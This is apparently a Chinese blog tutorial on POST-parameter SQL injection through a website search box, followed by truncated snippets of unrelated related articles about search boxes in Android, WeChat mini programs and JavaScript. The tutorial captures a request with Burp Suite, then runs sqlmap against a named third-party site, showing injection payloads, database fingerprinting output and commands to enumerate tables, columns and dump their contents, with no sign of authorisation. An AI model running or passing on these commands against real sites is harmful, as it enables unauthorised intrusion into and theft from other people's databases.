sqlmap post搜索框的注入

post注入框的注入原理 大家可以自己百度一下哦!

要进行post注入我们首先要抓包 。。

用burpsuite或fildder

打开浏览器,设置代理,如代理8080端口

好了 随便输入一个1字 burpsuite已经抓到包了

key=1&x=23&y=4

然后我们启动sqlmap 构造一下(直接在命令行输入) sqlmap -u http://****.cn/product.asp --data "key=1&x=23&y=4"
Place: POST
Parameter: key
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: key=1%‘ AND 1393=1393 AND ‘%‘=‘&x=24&y=9

Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: key=-3532%‘ UNION ALL SELECT NULL,NULL,CHR(113)&CHR(104)&CHR(101)&CHR(110)&CHR(113)&CHR(103)&CHR(109)&CHR(84)&CHR(80)&CHR(98)&CHR(100)&CHR(74)&CHR(105)&CHR(102)&CHR(102)&CHR(113)&CHR(105)&CHR(114)&CHR(108)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&x=24&y=9
---
[23:58:56] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft Access
[23:58:56] [INFO] fetched data logged to text files under ‘/usr/share/sqlmap/output/www.zjyingsong.com‘
Place: POST

嗯 post型注入 然后我们就可以猜解了

sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --tables //猜解表段

sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --columns -T 表段 //猜解字段

sqlmap -u http://www.zjyingsong.com/product.asp --data "key=1&x=23&y=4" --dump C "内容,内容," -T 刚才的表段 //猜解内容

原文地址:https://www.cnblogs.com/bzdmz/p/11107420.html

时间: 2024-10-23 13:42:03

sqlmap post搜索框的注入的相关文章

POST注入--搜索框

POST注入的分类有很多: 搜索框 登录框 认证框 还有XXXX,总之什么情况就是什么注入 言而总之,都他么一样,不就是POST传数据的时候动点手脚么? 写了个简单的搜索框注入的网页: 代码折叠了,大家展开看 1 <!DOCTYPE html> 2 <html> 3 <head> 4 <title>搜索型注入</title> 5 <meta charset="utf-8"> 6 </head> 7 &l

搜索框注入

author:鸿鸿 本人是小菜,水平有限,但是为了论坛做贡献,还是自己写点原创的东西出来吧.希望大牛看了别笑就好了.... ======================================================= 前段时间朋友丢了一个站过来,说是他们学校的.叫我帮忙检测下. 于是看了下.用扫描器扫了下,没有啥可以上传利用的,发现后台,默认和万能密码无效, 无注入点,手工和工具试过了,防注入,COOKIES注入也不行.找不到程序源码,没办法分析.旁注 ? 整站是独立服务器,就

Android零基础入门第62节:搜索框组件SearchView

原文:Android零基础入门第62节:搜索框组件SearchView 一.SearchView概述 SearchView是搜索框组件,它可以让用户在文本框内输入文字,并允许通过监听器监控用户输入,当用户输入完成后提交搜索时,也可通过监听器执行实际的搜索. SearchView默认是展示一个search的icon,点击icon展开搜索框,也可以自己设定图标.用SearchView时可指定如下表所示的常见XML属性及相关方法. 如果为SearchView增加一个配套的ListView,则可以为Se

Android----- 改变图标原有颜色 和 搜索框

本博客主要讲以下两点知识点 图标改变颜色:Drawable的变色,让Android也能有iOS那么方便的图片色调转换,就像同一个图标,但是有多个地方使用,并且颜色不一样,就可以用这个方法了. 搜索框: 一般是EditText实现,本文 实现 TextView图片和文字居中,键盘搜索. 来看看效果图: 图标改变颜色:第一个界面的左边(二维码)和右边(更多)两个实现,我放进去的图片是黑色的,显示出来是白色的. 搜索框:第一个界面的图片和文字居中,还可以设置间距,第二个见面搜索设置键盘搜索按钮,点击搜

模糊查询(类似百度搜索框)

很常见的搜索框,很常用,总结一下,怕自己忘了,使用的是原生的js. 这是原生写的,代码很简单,重要是思路.主要就是用了一个indexOf(),很简单.越简单的东西越难想到,很多人都会想到用正则去做,这样就舍近求远了. html部分: <div id="box"> <input type="text" id="txt" value = ""> <input type="button&quo

微信小程序开发之带搜索记录的搜索框

实现功能:点击搜索框,有搜索记录时以下拉菜单显示,点击下拉子菜单,将数据赋值到搜索框,点击搜索图标搜索,支持清空历史记录,可手动输入和清空查询关键字, UI: wxml: <!--查询历史记录数据--><view class="ddclass" style="margin-left: 50rpx;z-index:80" hidden="{{!StorageFlag}}" style="z-index:100"

模拟百度搜索框,输入时显示历史记录

今天写了个小demo,利用本地存储的特点,模拟百度搜索框. 主要知识是利用本地存储的特点,模拟百度搜索时的历史记录显示. 主要HTML代码为 <div class="search"> <input type="text"/> <button class="btn">搜索</button> </div> <ul class="hidden"> <li&

iOS UISearchController 搜索框

#import <Foundation/Foundation.h> @interface Student : NSObject @property(strong,nonatomic) NSString *name; @property(strong,nonatomic) NSString *pic; @property(strong,nonatomic) NSString *tel; -(Student *)initWithDic:(NSDictionary *)dic; +(Student

Android学习笔记(29):搜索框SearchView

SearchView提供一个搜索框,可以监听用户输入,用户提交搜索时,也可以通过监听器执行实际行动. 常用XML属性和相关方法: XML属性 相关方法 说明 android:iconifiedByDefault setIconifiedByDefault(boolean) 设置搜索框是否自动缩小为图标 setSubmitButtonEnable(boolean) 设置是否显示搜索按钮 android:inputType setInputType(int) 设置输入文本格式 android:max